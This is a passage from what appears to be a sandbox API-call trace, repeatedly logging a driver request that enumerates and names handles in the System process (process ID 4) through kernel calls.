ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.083] ObReferenceObjectByHandle (in: Handle=0xffffffff80000688, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8c2c0, HandleInformation=0x0) returned 0x0 [0241.083] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.083] PsReleaseProcessExitSynchronization () returned 0x2 [0241.083] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.083] ObQueryNameString (in: Object=0xfffffa8001f8c2c0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.083] ObfDereferenceObject (Object=0xfffffa8001f8c2c0) returned 0x2 [0241.083] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.083] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.083] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.083] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.083] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.083] PsAcquireProcessExitSynchronization () returned 0x0 [0241.083] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.083] ObReferenceObjectByHandle (in: Handle=0xffffffff8000068c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f80ab0, HandleInformation=0x0) returned 0x0 [0241.083] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.083] PsReleaseProcessExitSynchronization () returned 0x2 [0241.083] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.083] ObQueryNameString (in: Object=0xfffffa8001f80ab0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.083] ObfDereferenceObject (Object=0xfffffa8001f80ab0) returned 0x2 [0241.083] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.083] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.083] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.083] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.084] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.084] PsAcquireProcessExitSynchronization () returned 0x0 [0241.084] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.084] ObReferenceObjectByHandle (in: Handle=0xffffffff80000690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8dd20, HandleInformation=0x0) returned 0x0 [0241.084] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.084] PsReleaseProcessExitSynchronization () returned 0x2 [0241.084] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.084] ObQueryNameString (in: Object=0xfffffa8001f8dd20, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.084] ObfDereferenceObject (Object=0xfffffa8001f8dd20) returned 0x2 [0241.084] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.084] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.084] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.084] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.084] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.084] PsAcquireProcessExitSynchronization () returned 0x0 [0241.084] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.084] ObReferenceObjectByHandle (in: Handle=0xffffffff80000694, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f7ff20, HandleInformation=0x0) returned 0x0 [0241.084] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.084] PsReleaseProcessExitSynchronization () returned 0x2 [0241.084] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.084] ObQueryNameString (in: Object=0xfffffa8001f7ff20, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.084] ObfDereferenceObject (Object=0xfffffa8001f7ff20) returned 0x2 [0241.084] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.084] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.085] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.085] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.085] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.085] PsAcquireProcessExitSynchronization () returned 0x0 [0241.085] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.085] ObReferenceObjectByHandle (in: Handle=0xffffffff80000698, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8c050, HandleInformation=0x0) returned 0x0 [0241.085] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.085] PsReleaseProcessExitSynchronization () returned 0x2 [0241.085] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.085] ObQueryNameString (in: Object=0xfffffa8001f8c050, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.085] ObfDereferenceObject (Object=0xfffffa8001f8c050) returned 0x2 [0241.085] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.085] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.085] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.085] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xae, lpOverlapped=0x0) returned 1 [0241.085] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.085] PsAcquireProcessExitSynchronization () returned 0x0 [0241.085] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.085] ObReferenceObjectByHandle (in: Handle=0xffffffff8000069c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80022b73b0, HandleInformation=0x0) returned 0x0 [0241.085] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.085] PsReleaseProcessExitSynchronization () returned 0x2 [0241.085] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.085] ObQueryNameString (in: Object=0xfffffa80022b73b0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.299] ObfDereferenceObject (Object=0xfffffa80022b73b0) returned 0x0 [0241.299] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.299] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.299] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.299] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.299] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.299] PsAcquireProcessExitSynchronization () returned 0x0 [0241.299] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.299] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8cb80, HandleInformation=0x0) returned 0x0 [0241.299] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.299] PsReleaseProcessExitSynchronization () returned 0x2 [0241.299] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.299] ObQueryNameString (in: Object=0xfffffa8001f8cb80, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.299] ObfDereferenceObject (Object=0xfffffa8001f8cb80) returned 0x2 [0241.299] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.300] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.300] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.300] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.300] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.300] PsAcquireProcessExitSynchronization () returned 0x0 [0241.300] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.300] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f81b80, HandleInformation=0x0) returned 0x0 [0241.300] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.300] PsReleaseProcessExitSynchronization () returned 0x2 [0241.300] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.300] ObQueryNameString (in: Object=0xfffffa8001f81b80, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.300] ObfDereferenceObject (Object=0xfffffa8001f81b80) returned 0x2 [0241.300] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.300] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.300] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.300] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.300] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.300] PsAcquireProcessExitSynchronization () returned 0x0 [0241.300] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.300] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8a2c0, HandleInformation=0x0) returned 0x0 [0241.300] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.301] PsReleaseProcessExitSynchronization () returned 0x2 [0241.301] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.301] ObQueryNameString (in: Object=0xfffffa8001f8a2c0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.301] ObfDereferenceObject (Object=0xfffffa8001f8a2c0) returned 0x2 [0241.301] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.301] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.301] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.301] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.301] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.301] PsAcquireProcessExitSynchronization () returned 0x0 [0241.301] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.301] ObReferenceObjectByHandle (in: Handle=0xffffffff800006ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f81050, HandleInformation=0x0) returned 0x0 [0241.301] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.301] PsReleaseProcessExitSynchronization () returned 0x2 [0241.301] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.301] ObQueryNameString (in: Object=0xfffffa8001f81050, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.301] ObfDereferenceObject (Object=0xfffffa8001f81050) returned 0x2 [0241.301] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.301] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.301] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.301] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.301] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.301] PsAcquireProcessExitSynchronization () returned 0x0 [0241.301] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.302] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8bab0, HandleInformation=0x0) returned 0x0 [0241.302] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.302] PsReleaseProcessExitSynchronization () returned 0x2 [0241.302] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.302] ObQueryNameString (in: Object=0xfffffa8001f8bab0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.302] ObfDereferenceObject (Object=0xfffffa8001f8bab0) returned 0x2 [0241.302] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.302] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.302] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.302] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.302] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.302] PsAcquireProcessExitSynchronization () returned 0x0 [0241.302] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.302] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f82d20, HandleInformation=0x0) returned 0x0 [0241.302] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.302] PsReleaseProcessExitSynchronization () returned 0x2 [0241.302] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.302] ObQueryNameString (in: Object=0xfffffa8001f82d20, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.302] ObfDereferenceObject (Object=0xfffffa8001f82d20) returned 0x2 [0241.302] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.302] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.302] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.302] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.302] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.303] PsAcquireProcessExitSynchronization () returned 0x0 [0241.303] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.303] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8af20, HandleInformation=0x0) returned 0x0 [0241.303] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.303] PsReleaseProcessExitSynchronization () returned 0x2 [0241.303] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.303] ObQueryNameString (in: Object=0xfffffa8001f8af20, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.303] ObfDereferenceObject (Object=0xfffffa8001f8af20) returned 0x2 [0241.303] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.303] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.303] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.303] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0241.303] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.303] PsAcquireProcessExitSynchronization () returned 0x0 [0241.303] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.303] ObReferenceObjectByHandle (in: Handle=0xffffffff800006bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f812c0, HandleInformation=0x0) returned 0x0 [0241.303] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.303] PsReleaseProcessExitSynchronization () returned 0x2 [0241.303] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.303] ObQueryNameString (in: Object=0xfffffa8001f812c0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.303] ObfDereferenceObject (Object=0xfffffa8001f812c0) returned 0x2 [0241.303] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.303] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.303] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.304] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.304] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.304] PsAcquireProcessExitSynchronization () returned 0x0 [0241.304] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.304] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f8a980, HandleInformation=0x0) returned 0x0 [0241.304] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.304] PsReleaseProcessExitSynchronization () returned 0x2 [0241.304] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.304] ObQueryNameString (in: Object=0xfffffa8001f8a980, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.304] ObfDereferenceObject (Object=0xfffffa8001f8a980) returned 0x2 [0241.304] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.304] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.304] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.304] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.304] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.304] PsAcquireProcessExitSynchronization () returned 0x0 [0241.304] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.304] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c4, DesiredAccess=0x0, ObjectType=0x0, 